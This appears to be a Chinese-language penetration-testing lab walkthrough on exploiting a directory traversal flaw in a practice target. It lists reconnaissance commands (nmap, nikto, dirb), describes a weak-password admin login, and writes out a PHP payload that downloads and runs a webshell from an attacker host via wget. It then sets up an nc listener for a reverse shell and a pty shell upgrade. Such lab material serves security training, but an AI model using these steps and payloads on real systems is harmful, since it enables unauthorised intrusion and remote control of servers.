目錄遍歷漏洞介紹
路徑遍歷攻擊(也稱爲目錄遍歷)旨在訪問存儲在Web根文件夾之外的文件和目錄。通過操縱帶有“點-斜線(…)”序列及其變化的文件或使用絕對文件路徑來引用文件的變量,可以訪問存儲在文件系統上的任意文件和目錄,包括應用程序源代碼、配置和關鍵系統文件。
需要注意的是,系統操作訪問控制(如在微軟Windows操作系統上鎖定或使用文件)限制了對文件的訪問權限。
這種攻擊也稱爲“點-點斜線”、“目錄遍歷”、“目錄爬升”和“回溯”。
信息探測
這次只說一下信息探測的以往的語法:
掃描主機服務信息以及服務版本
nmap -sV 靶場IP地址
快速掃描主機全部信息
nmap -T4 –A -v 靶場IP地址
探測敏感信息
nikto -host http://靶場IP地址:端口
目錄信息探測 dirb http://靶場IP:端口
深入挖掘
分析nmap 、nikto掃描結果,並對結果進行分析,挖掘可以利用的信息;
例如:端口開放的http服務要充分利用。
敏感目錄
一些url(dbadmin、php)等一些敏感詞彙。
接着使用瀏覽器打開 http://ip:port/敏感頁面,查看敏感信息,找到可利用的位置;
漏洞掃描
owasp-zap web漏洞掃描器,自動挖掘web應用程序中的漏洞
打開終端輸入owasp-zap 會出現一下所示:
然後利用掃描器進行掃描,掃描完畢之後,alerts選項如果出現紅色圖標那就證明是高危漏洞。點擊會出現目錄信息。即目錄遍歷漏洞。
分析漏洞掃描結果
利用目錄遍歷漏洞獲取shell思路:
上傳webshell到服務器,之後通過對應的目錄遍歷路徑訪問webshell,執行webshell。在kali linux當中獲取反彈shell;
敏感頁面上傳shell
dbadmin 敏感目錄有敏感頁面,瀏覽器訪問,使用弱口令嘗試登陸;
使用admin進行登錄可以進入系統後臺。
登陸頁面之後 查找可利用的寫webshell的點;
使用/usr/share/webshells/php/下的webshell
打開終端輸入 cd /usr/share/webshells/php 打開該目錄,然後使用ls進行查看webshell
利用cp 文件名/root/Desktop
進行下載到桌面。
然後利用cd ls gedit進行查看下載內容(也可以進行修改其內容:IP地址修改爲攻擊機的IP地址ifconfig進行查看,端口號可以隨意修改)。
修改webshell名稱:```mv 文件名 修改後的文件名``
在系統後臺新建數據庫,數據表,字段(寫入<?php system(“cd /tmp;wget http://ip:port/webshell.php;chmod +x webshell.php;php webshell”);?>)
進行如上操作進行寫入。便於複製粘貼上傳webshell。
監聽反彈shell
創建服務器用於靶場機器下載對應webshell
python –m “SimpleHTTPServer”
啓動監聽 nc
nc –nlvp 端口號
端口號爲上述自己修改的端口號。
輸入id進行查看對應的權限
啓動終端
python –c “import pty;pty.spawn(‘/bin/bash’)”
返回對應的終端